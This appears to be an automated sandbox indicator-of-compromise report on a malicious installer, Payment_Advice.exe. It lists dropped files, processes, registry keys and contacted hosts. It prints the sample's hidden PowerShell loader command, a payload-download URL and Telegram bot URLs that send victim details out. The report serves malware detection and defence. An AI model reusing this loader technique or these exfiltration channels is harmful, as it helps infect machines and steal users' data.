IOC Report
Payment_Advice.exe

loading gif

Files

File Path
Type
Category
Malicious
Payment_Advice.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys
ASCII text, with very long lines (65536), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\Payment_Advice.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\Payment_Advice.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lci5lel0.4m2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uskty4tf.nv4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afsbende.Tid
data
dropped
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\lokalplanrammes.sus
data
dropped
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas\ondskabsfuldhedernes.txt
ASCII text, with very long lines (367), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\grensav.sjl
data
dropped
C:\Users\user\AppData\Local\Temp\nspC30E.tmp
data
dropped
There are 2 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Payment_Advice.exe
"C:\Users\user\Desktop\Payment_Advice.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Mazing=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Fillock161.Sys';$Rejsemontrer=$Mazing.SubString(4669,3);.$Rejsemontrer($Mazing) "
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://duckduckgo.com/chrome_newtab
unknown
https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.bin
108.167.181.251
https://duckduckgo.com/ac/?q=
unknown
https://www.reap.skyestates.com.mt/wp-includes/QMHHyMk225.binN
unknown
http://r10.i.lencr.org/01
unknown
https://api.telegram.org
unknown
https://api.telegram.org/bot
unknown
https://contoso.com/License
unknown
https://www.office.com/lB
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://chrome.google.com/webstore?hl=en
unknown
http://varders.kozow.com:8081
unknown
http://mail.electromac.com.bo
unknown
http://checkip.dyndns.org/
193.122.6.168
https://aka.ms/pscore6lB
unknown
http://x1.c.lencr.org/0
unknown
http://x1.i.lencr.org/0
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://chrome.google.com/webstore?hl=enlB
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://reallyfreegeoip.org/xml/
unknown
https://www.office.com/
unknown
http://nuget.org/NuGet.exe
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://www.reap.skyestates.com.mt/
unknown
http://r10.o.lencr.org0#
unknown
http://checkip.dyndns.org
unknown
http://electromac.com.bo
unknown
http://nsis.sf.net/NSIS_ErrorError
unknown
https://reallyfreegeoip.org/xml/8.46.123.33
188.114.97.3
https://api.telegram.org/bot/sendMessage?chat_id=&text=
unknown
https://www.ecosia.org/newtab/
unknown
https://github.com/Pester/Pester
unknown
http://aborters.duckdns.org:8081
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20a
unknown
http://51.38.247.67:8081/_send_.php?L
unknown
http://crl.micro
unknown
https://reallyfreegeoip.org/xml/8.46.123.33$
unknown
http://anotherarmy.dns.army:8081
unknown
https://reallyfreegeoip.org
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:468325%0D%0ADate%20and%20Time:%2026/07/2024%20/%2004:58:36%0D%0ACountry%20Name:%20%0D%0A%5B%20468325%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
There are 39 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
reallyfreegeoip.org
188.114.97.3
malicious
electromac.com.bo
192.185.142.133
malicious
api.telegram.org
149.154.167.220
malicious
mail.electromac.com.bo
unknown
malicious
checkip.dyndns.org
unknown
malicious
www.reap.skyestates.com.mt
108.167.181.251
checkip.dyndns.com
193.122.6.168

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
192.185.142.133
electromac.com.bo
United States
malicious
188.114.97.3
reallyfreegeoip.org
European Union
malicious
193.122.6.168
checkip.dyndns.com
United States
108.167.181.251
www.reap.skyestates.com.mt
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\fordjelsesbesvret\Uninstall\Spidsfindigeres22
luftrr
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileDirectory
There are 6 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
9D91000
direct allocation
page execute and read and write
malicious
21681000
trusted library allocation
page read and write
malicious
612F000
trusted library allocation
page read and write
21727000
trusted library allocation
page read and write
2870000
trusted library allocation
page read and write
5BB7000
trusted library allocation
page read and write
30E0000
heap
page read and write
244A0000
trusted library allocation
page read and write
21958000
trusted library allocation
page read and write
237F0000
trusted library allocation
page read and write
2186A000
trusted library allocation
page read and write
23680000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
22706000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
22AA2000
trusted library allocation
page read and write
560000
heap
page read and write
244C0000
trusted library allocation
page read and write
245F0000
trusted library allocation
page read and write
2156E000
stack
page read and write
23B07000
heap
page read and write
244C0000
trusted library allocation
page read and write
4F79000
heap
page read and write
84DD000
stack
page read and write
237E0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
23780000
trusted library allocation
page read and write
21787000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
245F0000
trusted library allocation
page read and write
5862000
trusted library allocation
page read and write
23ABF000
heap
page read and write
5C50000
heap
page read and write
237F0000
trusted library allocation
page read and write
23790000
trusted library allocation
page read and write
216F2000
trusted library allocation
page read and write
23B56000
heap
page read and write
237E0000
trusted library allocation
page read and write
31F2000
trusted library allocation
page read and write
23780000
trusted library allocation
page read and write
23D4F000
stack
page read and write
245F0000
trusted library allocation
page read and write
21860000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
23ABF000
heap
page read and write
5D60000
direct allocation
page read and write
401000
unkown
page execute read
245F0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
229D0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
217E5000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
228D8000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
7A60000
trusted library allocation
page read and write
42A000
unkown
page read and write
237E0000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
4F70000
heap
page read and write
218F0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
244CF000
trusted library allocation
page read and write
214A0000
direct allocation
page read and write
218FF000
trusted library allocation
page read and write
2114F000
stack
page read and write
237E0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
5C00000
trusted library allocation
page read and write
22792000
trusted library allocation
page read and write
8A40000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
2172B000
trusted library allocation
page read and write
5D30000
direct allocation
page read and write
85C0000
trusted library allocation
page read and write
2373A000
trusted library allocation
page read and write
2118E000
stack
page read and write
237E0000
trusted library allocation
page read and write
30ED000
heap
page read and write
228A3000
trusted library allocation
page read and write
21769000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
5E1C000
heap
page read and write
245F0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
5BE0000
trusted library allocation
page read and write
21833000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
238C1000
heap
page read and write
237E0000
trusted library allocation
page read and write
21660000
heap
page read and write
2173B000
trusted library allocation
page read and write
4FDF000
trusted library allocation
page read and write
245F0000
trusted library allocation
page read and write
703E000
stack
page read and write
2EE0000
heap
page read and write
2160C000
stack
page read and write
237E0000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
244E0000
trusted library allocation
page read and write
78EE000
stack
page read and write
24480000
trusted library allocation
page read and write
237F0000
trusted library allocation
page read and write
229A6000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
218F5000
trusted library allocation
page read and write
5C55000
heap
page read and write
6116000
trusted library allocation
page read and write
244F0000
trusted library allocation
page read and write
244D0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
5C80000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
217C8000
trusted library allocation
page read and write
23A90000
heap
page read and write
24850000
trusted library allocation
page read and write
5C20000
heap
page read and write
2874000
trusted library allocation
page read and write
237F0000
trusted library allocation
page read and write
2110E000
stack
page read and write
23790000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
2E9E000
stack
page read and write
23810000
heap
page read and write
31F5000
trusted library allocation
page execute and read and write
28AB000
trusted library allocation
page execute and read and write
2182B000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
287D000
trusted library allocation
page execute and read and write
23D0D000
stack
page read and write
244A0000
trusted library allocation
page read and write
22714000
trusted library allocation
page read and write
5C00000
trusted library allocation
page read and write
7170000
direct allocation
page read and write
2E50000
heap
page read and write
228C3000
trusted library allocation
page read and write
444000
unkown
page read and write
87EE000
stack
page read and write
216FA000
trusted library allocation
page read and write
23726000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
23720000
trusted library allocation
page read and write
24840000
trusted library allocation
page read and write
21839000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
2270C000
trusted library allocation
page read and write
4F81000
trusted library allocation
page read and write
31E0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
23790000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
5D20000
direct allocation
page read and write
245F0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
7A50000
trusted library allocation
page read and write
2124D000
stack
page read and write
244A0000
trusted library allocation
page read and write
244F0000
trusted library allocation
page read and write
23780000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
22700000
trusted library allocation
page read and write
21400000
remote allocation
page read and write
5BC0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
21670000
heap
page read and write
23A7E000
stack
page read and write
98000
stack
page read and write
245F0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
400000
unkown
page readonly
24480000
trusted library allocation
page read and write
22A22000
trusted library allocation
page read and write
2373E000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
5FA9000
trusted library allocation
page read and write
7820000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
5C40000
heap
page readonly
88EB000
heap
page read and write
76C3000
heap
page read and write
8520000
heap
page read and write
23790000
trusted library allocation
page read and write
244F0000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
401000
unkown
page execute read
244C0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
5F89000
trusted library allocation
page read and write
8A60000
trusted library allocation
page execute and read and write
24480000
trusted library allocation
page read and write
40B000
unkown
page read and write
237E0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
7F160000
trusted library allocation
page execute and read and write
75D7000
trusted library allocation
page read and write
407000
unkown
page readonly
24480000
trusted library allocation
page read and write
237F0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
5E23000
heap
page read and write
2147F000
stack
page read and write
7450000
heap
page read and write
5D50000
direct allocation
page read and write
23770000
trusted library allocation
page read and write
216F6000
trusted library allocation
page read and write
23800000
trusted library allocation
page read and write
6FFE000
stack
page read and write
22879000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
2183E000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
23800000
trusted library allocation
page read and write
244E0000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
70F0000
direct allocation
page read and write
5D90000
heap
page read and write
237E0000
trusted library allocation
page read and write
23806000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
212CE000
stack
page read and write
761D000
heap
page read and write
237E0000
trusted library allocation
page read and write
23790000
trusted library allocation
page read and write
21966000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
5C00000
trusted library allocation
page read and write
2172F000
trusted library allocation
page read and write
585C000
trusted library allocation
page read and write
4E50000
trusted library allocation
page execute and read and write
85B0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
23804000
trusted library allocation
page read and write
210B0000
heap
page read and write
7A40000
trusted library allocation
page read and write
22A40000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
434000
unkown
page read and write
7810000
trusted library allocation
page read and write
32B0000
heap
page readonly
426000
unkown
page read and write
24610000
trusted library allocation
page execute and read and write
237E0000
trusted library allocation
page read and write
218FA000
trusted library allocation
page read and write
2260000
heap
page read and write
244C0000
trusted library allocation
page read and write
23780000
trusted library allocation
page read and write
3180000
heap
page read and write
226FD000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
5D80000
direct allocation
page read and write
409000
unkown
page write copy
5C57000
heap
page read and write
5E28000
heap
page read and write
7800000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
21974000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
23780000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
448000
unkown
page readonly
244C0000
trusted library allocation
page read and write
23790000
trusted library allocation
page read and write
9391000
direct allocation
page execute and read and write
244C0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
31C0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
215B0000
trusted library allocation
page read and write
7A20000
trusted library allocation
page read and write
628000
heap
page read and write
237E0000
trusted library allocation
page read and write
7860000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
245EE000
stack
page read and write
237E0000
trusted library allocation
page read and write
245F0000
trusted library allocation
page read and write
237F0000
trusted library allocation
page read and write
5BF0000
trusted library allocation
page read and write
32E0000
heap
page read and write
8470000
trusted library allocation
page read and write
218D0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
2447E000
stack
page read and write
216E000
stack
page read and write
23780000
trusted library allocation
page read and write
2270E000
trusted library allocation
page read and write
237F0000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
31A0000
trusted library section
page read and write
22A8C000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
2182F000
trusted library allocation
page read and write
24860000
trusted library allocation
page read and write
23780000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
76DC000
heap
page read and write
214EA000
stack
page read and write
237E0000
trusted library allocation
page read and write
5DB0000
heap
page read and write
5BC0000
trusted library allocation
page read and write
23780000
trusted library allocation
page read and write
23790000
trusted library allocation
page read and write
24560000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
2139E000
stack
page read and write
244A0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
2EF6000
heap
page read and write
5BF0000
trusted library allocation
page read and write
22A33000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
2196C000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
23746000
trusted library allocation
page read and write
211CE000
stack
page read and write
3070000
trusted library section
page read and write
245F0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
88F000
stack
page read and write
24480000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
30E2000
heap
page read and write
60A000
heap
page read and write
5C70000
trusted library allocation
page read and write
50D6000
trusted library allocation
page read and write
87AC000
stack
page read and write
237E0000
trusted library allocation
page read and write
22993000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
75BF000
stack
page read and write
446000
unkown
page read and write
31EA000
trusted library allocation
page execute and read and write
23796000
trusted library allocation
page read and write
2295C000
trusted library allocation
page read and write
5BC0000
trusted library allocation
page read and write
22851000
trusted library allocation
page read and write
227BE000
trusted library allocation
page read and write
237A0000
trusted library allocation
page read and write
325E000
stack
page read and write
24600000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
237B0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
244F0000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
23800000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
23770000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
5BE0000
trusted library allocation
page read and write
7180000
direct allocation
page read and write
3660000
trusted library allocation
page read and write
5BC0000
trusted library allocation
page read and write
5BC0000
trusted library allocation
page read and write
226E8000
trusted library allocation
page read and write
5C60000
trusted library allocation
page read and write
2277F000
trusted library allocation
page read and write
2299000
heap
page read and write
5DA0000
direct allocation
page read and write
5DF2000
heap
page read and write
24480000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
245F0000
trusted library allocation
page read and write
244D0000
trusted library allocation
page read and write
7679000
heap
page read and write
7990000
trusted library allocation
page execute and read and write
22A16000
trusted library allocation
page read and write
23A80000
heap
page execute and read and write
237F0000
trusted library allocation
page read and write
218F8000
trusted library allocation
page read and write
244F0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
21650000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
5D70000
direct allocation
page read and write
2380A000
trusted library allocation
page read and write
23741000
trusted library allocation
page read and write
5E2E000
heap
page read and write
2BD8000
stack
page read and write
30BB000
heap
page read and write
244F0000
trusted library allocation
page read and write
24500000
trusted library allocation
page read and write
5C00000
trusted library allocation
page read and write
30AE000
heap
page read and write
2294D000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
796D000
stack
page read and write
244C0000
trusted library allocation
page read and write
602000
heap
page read and write
22681000
trusted library allocation
page read and write
9210000
direct allocation
page execute and read and write
237F0000
trusted library allocation
page read and write
5E31000
heap
page read and write
237F0000
trusted library allocation
page read and write
5BF0000
heap
page read and write
244D0000
trusted library allocation
page execute and read and write
23780000
trusted library allocation
page read and write
22937000
trusted library allocation
page read and write
5CA000
heap
page read and write
244C0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
A791000
direct allocation
page execute and read and write
24604000
trusted library allocation
page read and write
28A7000
trusted library allocation
page execute and read and write
237E0000
trusted library allocation
page read and write
237F0000
trusted library allocation
page read and write
4F45000
heap
page execute and read and write
244A0000
trusted library allocation
page read and write
4A0000
heap
page read and write
75E0000
heap
page execute and read and write
22866000
trusted library allocation
page read and write
227F4000
trusted library allocation
page read and write
5BD0000
trusted library allocation
page read and write
54E000
stack
page read and write
23780000
trusted library allocation
page read and write
244F0000
trusted library allocation
page read and write
2880000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
245F0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
216E7000
trusted library allocation
page read and write
5BD0000
trusted library allocation
page execute and read and write
244A0000
trusted library allocation
page read and write
2185C000
trusted library allocation
page read and write
21AB0000
trusted library allocation
page read and write
851F000
stack
page read and write
5F81000
trusted library allocation
page read and write
3CD1000
remote allocation
page execute and read and write
2EF0000
heap
page read and write
27EA000
heap
page read and write
76C8000
heap
page read and write
79D0000
trusted library allocation
page read and write
4F2F000
stack
page read and write
237E1000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
237DD000
stack
page read and write
23780000
trusted library allocation
page read and write
2120D000
stack
page read and write
244A0000
trusted library allocation
page read and write
31C4000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
8A70000
heap
page read and write
237E0000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
21733000
trusted library allocation
page read and write
24650000
trusted library allocation
page read and write
2EDF000
stack
page read and write
237F0000
trusted library allocation
page read and write
5E11000
heap
page read and write
245F0000
trusted library allocation
page read and write
5CF0000
direct allocation
page read and write
23790000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
7A30000
trusted library allocation
page read and write
70D0000
direct allocation
page read and write
244A0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
5AC0000
heap
page read and write
244F0000
trusted library allocation
page read and write
50D1000
remote allocation
page execute and read and write
244D0000
trusted library allocation
page read and write
237F0000
trusted library allocation
page read and write
5D00000
direct allocation
page read and write
244C0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
32A0000
heap
page read and write
244C0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
229F0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
5C70000
trusted library allocation
page read and write
5BC0000
trusted library allocation
page read and write
21969000
trusted library allocation
page read and write
23A94000
heap
page read and write
237E0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
7110000
direct allocation
page read and write
237E0000
trusted library allocation
page read and write
7701000
heap
page read and write
2896000
trusted library allocation
page execute and read and write
24500000
trusted library allocation
page execute and read and write
244C0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
7645000
heap
page read and write
244A0000
trusted library allocation
page read and write
85D0000
trusted library allocation
page read and write
6FBE000
stack
page read and write
2443E000
stack
page read and write
24480000
trusted library allocation
page read and write
23780000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
22709000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
2295000
heap
page read and write
6129000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
2264000
heap
page read and write
244A0000
trusted library allocation
page read and write
21400000
remote allocation
page read and write
2269B000
trusted library allocation
page read and write
244F0000
trusted library allocation
page read and write
4EEE000
stack
page read and write
8575000
trusted library allocation
page read and write
31D9000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
2220000
heap
page read and write
570000
heap
page read and write
409000
unkown
page read and write
882C000
stack
page read and write
3080000
heap
page read and write
31B0000
trusted library allocation
page read and write
21400000
remote allocation
page read and write
244C0000
trusted library allocation
page read and write
2448D000
trusted library allocation
page read and write
7120000
direct allocation
page read and write
244F0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
3088000
heap
page read and write
289A000
trusted library allocation
page execute and read and write
2270000
heap
page read and write
8440000
heap
page read and write
244D0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
216DC000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
226F0000
trusted library allocation
page read and write
19A000
stack
page read and write
243FF000
stack
page read and write
216EA000
trusted library allocation
page read and write
21972000
trusted library allocation
page read and write
7AAB000
stack
page read and write
7130000
direct allocation
page read and write
237F0000
trusted library allocation
page read and write
2297E000
trusted library allocation
page read and write
5D40000
direct allocation
page read and write
792E000
stack
page read and write
212F000
stack
page read and write
21831000
trusted library allocation
page read and write
2BDD000
stack
page read and write
5C00000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
22694000
trusted library allocation
page read and write
238F8000
heap
page read and write
245F0000
trusted library allocation
page read and write
244E0000
trusted library allocation
page execute and read and write
23D8E000
stack
page read and write
237E0000
trusted library allocation
page read and write
5E2A000
heap
page read and write
22A27000
trusted library allocation
page read and write
23780000
trusted library allocation
page read and write
8A50000
trusted library allocation
page execute and read and write
75F0000
heap
page read and write
244C0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
4F40000
heap
page execute and read and write
245F0000
trusted library allocation
page read and write
876C000
stack
page read and write
5CE0000
direct allocation
page read and write
24480000
trusted library allocation
page read and write
215AF000
stack
page read and write
244C0000
trusted library allocation
page read and write
23790000
trusted library allocation
page read and write
8530000
trusted library allocation
page execute and read and write
226F6000
trusted library allocation
page read and write
23760000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
7980000
trusted library allocation
page read and write
85E0000
trusted library allocation
page read and write
421000
unkown
page read and write
23B3E000
heap
page read and write
5BC0000
trusted library allocation
page read and write
32A7000
heap
page read and write
244C0000
trusted library allocation
page read and write
216D0000
trusted library allocation
page read and write
21862000
trusted library allocation
page read and write
21737000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
23A3E000
stack
page read and write
85A0000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
23780000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
7140000
direct allocation
page read and write
245F0000
trusted library allocation
page read and write
23780000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
4E60000
trusted library allocation
page read and write
5E31000
heap
page read and write
244A0000
trusted library allocation
page read and write
78AE000
stack
page read and write
5BF0000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
5DB8000
heap
page read and write
244A0000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
5C00000
trusted library allocation
page read and write
22A6C000
trusted library allocation
page read and write
244C0000
trusted library allocation
page read and write
24480000
trusted library allocation
page read and write
7160000
direct allocation
page read and write
217D5000
trusted library allocation
page read and write
5C00000
trusted library allocation
page read and write
23780000
trusted library allocation
page read and write
23780000
trusted library allocation
page read and write
244A0000
trusted library allocation
page read and write
245F0000
trusted library allocation
page read and write
7600000
heap
page read and write
46D1000
remote allocation
page execute and read and write
70E0000
direct allocation
page read and write
244C0000
trusted library allocation
page read and write
237E0000
trusted library allocation
page read and write
245F0000
trusted library allocation
page read and write
23DCF000
stack
page read and write
244C0000
trusted library allocation
page read and write
42E000
